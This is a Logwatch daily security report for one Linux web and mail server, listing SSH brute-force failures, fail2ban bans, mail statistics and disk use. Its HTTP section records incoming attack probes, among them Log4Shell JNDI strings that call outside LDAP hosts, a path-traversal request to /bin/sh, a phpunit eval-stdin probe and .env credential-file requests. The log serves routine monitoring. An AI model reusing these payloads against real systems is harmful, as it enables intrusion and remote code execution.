[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

Samstag, 18 Dezember 2021


 
 ################### Logwatch 7.4.0 (03/01/11) #################### 
        Processing Initiated: Sat Dec 18 04:42:04 2021
        Date Range Processed: yesterday
                              ( 2021-Dec-17 )
                              Period is day.
        Detail Level of Output: 0
        Type of Output/Format: mail / text
        Logfiles for Host: h2361197.stratoserver.net
 ################################################################## 
 
 --------------------- fail2ban-messages Begin ------------------------ 

 Banned services with Fail2Ban:				 Bans:Unbans
    ssh:                                                    [ 32:32 ]
 
 ---------------------- fail2ban-messages End ------------------------- 

 
 --------------------- httpd Begin ------------------------ 

 
 A total of 7 sites probed the server 
    103.153.76.212
    157.245.102.144
    20.101.106.180
    205.185.124.100
    216.238.73.231
    61.219.11.151
    64.227.41.14
 
 Requests with error response codes
    400 Bad Request
       null: 11 Time(s)
       mstshash=Domain: 4 Time(s)
       /config/getuser?index=0: 3 Time(s)
       /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... -MF3zWbyg92AADk: 3 Time(s)
       mstshash=Administr: 3 Time(s)
       /: 2 Time(s)
       /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
       /socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... FX0JBEznOXtAADg: 2 Time(s)
       /w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
       7: 2 Time(s)
       /.env: 1 Time(s)
       /ab2g: 1 Time(s)
       /ab2h: 1 Time(s)
       D\xF0^\xC4\xCA\x16a\xE2\x8Ef\x8Cs\x0C\x97\ ... C0$\x13\x05\xC0: 1 Time(s)
       HTTP/1.0: 1 Time(s)
       O\x06*\xA2: 1 Time(s)
       R\xECG\xDF\x9C\x7F\x1B\xDD\xAE!\xE8\x9A\xB ... H\xCE\x09\x1Ea:: 1 Time(s)
       \x01\xB8\xF8AY\xA0]\x87`%\xBC\xD4=w\xBB\x9 ... C0\xAD\xC0$\xC0: 1 Time(s)
       \x16\x0E\xCBp\x5C\xEB~\xC1\xE6\xBCW\xDC\x0 ... C0\xAE\xC0+\xC0: 1 Time(s)
       \x82m\xD7R\xA3\xF6l~:#x\x15\x0F\x04\xA7\xA ... C\x00<\x00/\x00: 1 Time(s)
       \x925\xE0\x1F\x9CB\x8E\x88\xDDv\xEC\xDB~\x ... x09\xC0\x13\xC0: 1 Time(s)
       \xC5\xC7\xD4\xA1\xF1S|\xB2\x83H\xF4)\x14X\ ... x09\xC0\x13\xC0: 1 Time(s)
       \xC8'!\xEB\x95\xC0\x8A\x94g\xDFm\xB4\xAF\x ... x13\xC0\x11\x00: 1 Time(s)
       t\x1B\x1D\xB0\xBF\xA6\x9A\x10\xD1\x98\xCA: 1 Time(s)
       t{(a)\xD2\xA1\xC8+T\xB8\xD0.\xC5\xEAt\xBF\xC ... x09\xC0\x13\xC0: 1 Time(s)
       xmlns:xsd=\x22http://www.w3.org/2001/XMLSchema\x22: 1 Time(s)
    499 (undefined)
       /: 10 Time(s)
       /${jndi:ldap://31.131.16.127:1389/Exploit}: 1 Time(s)
       /login: 1 Time(s)
    500 Internal Server Error
       /: 29 Time(s)
       /.env: 7 Time(s)
       /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
       /?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
       /?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2 ... lxgpsjkgfrra%7D: 1 Time(s)
       /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
       /Autodiscover/Autodiscover.xml: 1 Time(s)
       /_ignition/execute-solution: 1 Time(s)
       /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
       /favicon.ico: 1 Time(s)
       /fuel: 1 Time(s)
       /mifs/.;/services/LogService: 1 Time(s)
       /nice%20ports%2C/Tri%6Eity.txt%2ebak: 1 Time(s)
       /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
 
 ---------------------- httpd End ------------------------- 

 
 --------------------- pam_unix Begin ------------------------ 

 sshd:
    Authentication Failures:
       root (180.76.57.58): 36 Time(s)
       root (139.59.228.214): 35 Time(s)
       root (r201-217-143-51.ir-static.anteldata.net.uy): 33 Time(s)
       root (50.142.80.34.bc.googleusercontent.com): 26 Time(s)
       unknown (114.80.85.75): 21 Time(s)
       root (113.110.166.25): 20 Time(s)
       unknown (201.119.167.25): 20 Time(s)
       root (106.13.6.113): 19 Time(s)
       unknown (r201-217-143-51.ir-static.anteldata.net.uy): 17 Time(s)
       unknown (139.59.228.214): 15 Time(s)
       unknown (50.142.80.34.bc.googleusercontent.com): 12 Time(s)
       root (113.116.5.156): 11 Time(s)
       root (203.160.55.212): 11 Time(s)
       unknown (106.13.6.113): 11 Time(s)
       unknown (180.76.57.58): 11 Time(s)
       root (ns3152155.ip-151-106-38.eu): 10 Time(s)
       root (201.119.167.25): 9 Time(s)
       root (60.255.230.126): 8 Time(s)
       unknown (203.160.55.212): 8 Time(s)
       unknown (113.110.166.25): 6 Time(s)
       root (178-117-237-173.access.telenet.be): 5 Time(s)
       unknown (128.187.26.211.sta.commander.net.au): 5 Time(s)
       unknown (60.255.230.126): 5 Time(s)
       unknown (ns3152155.ip-151-106-38.eu): 5 Time(s)
       root (179.112.19.24): 4 Time(s)
       root (115.248.153.89): 2 Time(s)
       root (128.187.26.211.sta.commander.net.au): 2 Time(s)
       unknown (176.125.36.117): 2 Time(s)
       unknown (194.61.26.211): 2 Time(s)
       unknown (2.195.224.165): 2 Time(s)
       unknown (220.177.194.10): 2 Time(s)
       unknown (240.94-182-91.adsl-dyn.isp.belgacom.be): 2 Time(s)
       unknown (59.29.227.55): 2 Time(s)
       backup (194.61.26.211): 1 Time(s)
       postgres (46.161.27.162): 1 Time(s)
       root (1.15.181.252): 1 Time(s)
       root (103.133.57.250): 1 Time(s)
       root (164.90.203.55): 1 Time(s)
       root (182.74.25.246): 1 Time(s)
       root (189.254.255.3): 1 Time(s)
       root (210.74.11.97): 1 Time(s)
       temp (50.142.80.34.bc.googleusercontent.com): 1 Time(s)
       unknown (115.248.153.89): 1 Time(s)
       unknown (134.236.247.145): 1 Time(s)
       unknown (146.185.79.101): 1 Time(s)
       unknown (178-117-237-173.access.telenet.be): 1 Time(s)
       unknown (179.112.19.24): 1 Time(s)
       unknown (server.kompraqui.com): 1 Time(s)
    Invalid Users:
       Unknown Account: 154 Time(s)
 
 
 ---------------------- pam_unix End ------------------------- 

 
 --------------------- Postfix Begin ------------------------ 

        1   Miscellaneous warnings  
 
    8.837K  Bytes accepted                               9,049
    8.837K  Bytes sent via SMTP                          9,049
 ========   ==================================================
 
        1   Accepted                                   100.00%
 --------   --------------------------------------------------
        1   Total                                      100.00%
 ========   ==================================================
 
        4   4xx Reject relay denied                    100.00%
 --------   --------------------------------------------------
        4   Total 4xx Rejects                          100.00%
 ========   ==================================================
 
       38   Connections             
       28   Connections lost (inbound) 
       38   Disconnections          
        1   Removed from queue      
        1   Sent via SMTP           
 
        1   SMTP dialog errors      
        2   Hostname verification errors (FCRDNS) 
 
 
 ---------------------- Postfix End ------------------------- 

 
 --------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------ 

 Large Mailbox threshold: 40MB (41943040 bytes)
  Warning: Large mailbox: mailman.gz (1747199807)
  Warning: Large mailbox: mailman (235703599967)
 
 ---------------------- sendmail-largeboxes (large mail spool files) End
------------------------- 

 
 --------------------- SSHD Begin ------------------------ 

 
 Failed logins from:
    1.15.181.252: 1 time
    34.80.142.50 (50.142.80.34.bc.googleusercontent.com): 27 times
    46.161.27.162: 1 time
    60.255.230.126: 8 times
    103.133.57.250: 1 time
    106.13.6.113: 19 times
    113.110.166.25: 20 times
    113.116.5.156: 11 times
    115.248.153.89: 2 times
    139.59.228.214: 35 times
    151.106.38.100 (ns3152155.ip-151-106-38.eu): 10 times
    164.90.203.55: 1 time
    178.117.237.173 (178-117-237-173.access.telenet.be): 5 times
    179.112.19.24 (179-112-19-24.user.vivozap.com.br): 4 times
    180.76.57.58: 36 times
    182.74.25.246: 1 time
    189.254.255.3 (customer-189-254-255-3-sta.uninet-ide.com.mx): 1 time
    194.61.26.211: 1 time
    201.119.167.25: 9 times
    201.217.143.51 (r201-217-143-51.ir-static.anteldata.net.uy): 33 times
    203.160.55.212: 11 times
    210.74.11.97: 1 time
    211.26.187.128 (128.187.26.211.sta.commander.net.au): 2 times
 
 Illegal users from:
    2001:470:1:c84::29: 1 time
    undef: 121 times
    2.195.224.165: 2 times
    34.80.142.50 (50.142.80.34.bc.googleusercontent.com): 12 times
    59.29.227.55: 2 times
    60.255.230.126: 5 times
    64.62.197.152: 1 time
    91.182.94.240 (240.94-182-91.adsl-dyn.isp.belgacom.be): 2 times
    106.13.6.113: 11 times
    113.110.166.25: 6 times
    114.80.85.75: 21 times
    115.248.153.89: 1 time
    134.236.247.145: 1 time
    139.59.228.214: 15 times
    146.185.79.101: 1 time
    151.106.38.100 (ns3152155.ip-151-106-38.eu): 5 times
    154.89.5.72: 1 time
    162.214.53.159 (server.kompraqui.com): 1 time
    176.125.36.117 (117-36-125-176.wifipon-rsbit.uar.net): 2 times
    178.117.237.173 (178-117-237-173.access.telenet.be): 1 time
    179.112.19.24 (179-112-19-24.user.vivozap.com.br): 1 time
    180.76.57.58: 11 times
    194.61.26.211: 2 times
    201.119.167.25: 20 times
    201.217.143.51 (r201-217-143-51.ir-static.anteldata.net.uy): 17 times
    203.160.55.212: 8 times
    211.26.187.128 (128.187.26.211.sta.commander.net.au): 5 times
    220.177.194.10: 2 times
 
 ---------------------- SSHD End ------------------------- 

 
 --------------------- Disk Space Begin ------------------------ 

 Filesystem         Size  Used Avail Use% Mounted on
 /dev/ploop33257p1  394G  242G  132G  65% /
 none               4.0G     0  4.0G   0% /dev
 
 
 ---------------------- Disk Space End ------------------------- 

 
 ###################### Logwatch End #########################

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

[TOPF] Logwatch for h2361197.stratoserver.net (Linux)